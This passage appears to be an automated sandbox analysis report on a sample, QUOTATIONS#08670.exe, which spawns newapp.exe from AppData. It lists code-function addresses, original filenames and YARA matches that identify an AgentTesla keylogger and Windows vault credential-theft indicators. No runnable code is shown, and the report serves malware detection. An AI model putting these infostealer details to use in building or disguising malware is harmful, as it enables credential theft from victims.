                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_079268280_2_07926828
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_079200400_2_07920040
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 0_2_071E21E50_2_071E21E5
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_0146E0104_2_0146E010
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_0146E7B54_2_0146E7B5
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_01464A684_2_01464A68
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_01463E504_2_01463E50
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_014641984_2_01464198
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_0146ADA04_2_0146ADA0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BC67B04_2_06BC67B0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BC6BB04_2_06BC6BB0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BC5AE84_2_06BC5AE8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BC5ADA4_2_06BC5ADA
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BC19104_2_06BC1910
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BE66384_2_06BE6638
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BE34B04_2_06BE34B0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BEB4DC4_2_06BEB4DC
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BE55E84_2_06BE55E8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BE7DC84_2_06BE7DC8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BE76E84_2_06BE76E8
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BE27284_2_06BE2728
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BE5D274_2_06BE5D27
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BEE3F04_2_06BEE3F0
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeCode function: 4_2_06BE00404_2_06BE0040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F686F98_2_02F686F9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F64B708_2_02F64B70
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F6AC388_2_02F6AC38
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F679B88_2_02F679B8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_02F6CD888_2_02F6CD88
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0622E1A88_2_0622E1A8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0622E1988_2_0622E198
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0622B81C8_2_0622B81C
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_077D35388_2_077D3538
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_077DDD708_2_077DDD70
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_077DDD6F8_2_077DDD6F
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_078922108_2_07892210
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0789CBA08_2_0789CBA0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB32E88_2_07CB32E8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CBCE848_2_07CBCE84
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CB32E38_2_07CB32E3
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_07CBD2108_2_07CBD210
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0810A5498_2_0810A549
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081049E28_2_081049E2
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0810A2508_2_0810A250
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08108A508_2_08108A50
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081027C08_2_081027C0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08103FF88_2_08103FF8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081000168_2_08100016
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081000408_2_08100040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081084488_2_08108448
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08107CD08_2_08107CD0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08107CE08_2_08107CE0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0810A2408_2_0810A240
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08107EBF8_2_08107EBF
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081066D08_2_081066D0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081066E08_2_081066E0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081027B08_2_081027B0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081037D88_2_081037D8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0810ABE08_2_0810ABE0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08103FE88_2_08103FE8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811B8388_2_0811B838
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081100408_2_08110040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081189418_2_08118941
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_08114D988_2_08114D98
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811EDA08_2_0811EDA0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_081199D78_2_081199D7
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811A5F88_2_0811A5F8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811AE718_2_0811AE71
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811C6E88_2_0811C6E8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811EC088_2_0811EC08
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E0B08_2_0811E0B0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E0A08_2_0811E0A0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811A5708_2_0811A570
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E9908_2_0811E990
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E9838_2_0811E983
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811D5D08_2_0811D5D0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811D5C18_2_0811D5C1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811B6708_2_0811B670
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811C6AF8_2_0811C6AF
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E7588_2_0811E758
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E7488_2_0811E748
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811E3A08_2_0811E3A0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811D3F98_2_0811D3F9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_0811EBF88_2_0811EBF8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 8_2_078921E58_2_078921E5
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_010886F99_2_010886F9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_01084B709_2_01084B70
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0108AC389_2_0108AC38
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_010879B89_2_010879B8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0108CD889_2_0108CD88
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_075435389_2_07543538
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0754DD5F9_2_0754DD5F
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0754DD709_2_0754DD70
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_076022109_2_07602210
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0760CBA09_2_0760CBA0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_076632E89_2_076632E8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0766EA489_2_0766EA48
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_0766D2109_2_0766D210
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_076632D99_2_076632D9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA27C09_2_07AA27C0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA8BC19_2_07AA8BC1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA42909_2_07AA4290
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AAA2509_2_07AAA250
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA49E39_2_07AA49E3
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA27B09_2_07AA27B0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA37D89_2_07AA37D8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA42809_2_07AA4280
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA7E289_2_07AA7E28
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA7E199_2_07AA7E19
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA85909_2_07AA8590
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA68289_2_07AA6828
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA00259_2_07AA0025
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA80079_2_07AA8007
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA681B9_2_07AA681B
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AA00409_2_07AA0040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABC6E89_2_07ABC6E8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABAE719_2_07ABAE71
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABEDA09_2_07ABEDA0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AB4D989_2_07AB4D98
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABA5F89_2_07ABA5F8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AB99D79_2_07AB99D7
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AB89419_2_07AB8941
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABB8389_2_07ABB838
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07AB00409_2_07AB0040
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE3A09_2_07ABE3A0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABD3F99_2_07ABD3F9
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABEBF89_2_07ABEBF8
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE7489_2_07ABE748
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE7589_2_07ABE758
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABC6B19_2_07ABC6B1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE9829_2_07ABE982
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE9909_2_07ABE990
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABD5C19_2_07ABD5C1
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABD5D09_2_07ABD5D0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABA56F9_2_07ABA56F
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE0A09_2_07ABE0A0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABE0B09_2_07ABE0B0
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_07ABEC089_2_07ABEC08
                  Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 9_2_076021E59_2_076021E5
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2019882237.0000000004E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4781ad81-0abf-42ba-9cb5-204cd7690d39.exe4 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2020384479.0000000004F60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4781ad81-0abf-42ba-9cb5-204cd7690d39.exe4 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2008575393.0000000002A2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename4781ad81-0abf-42ba-9cb5-204cd7690d39.exe4 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000000.00000002.2006152312.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2571149051.00000000010F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000440000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename4781ad81-0abf-42ba-9cb5-204cd7690d39.exe4 vs QUOTATIONS#08670.exe
                  Source: QUOTATIONS#08670.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
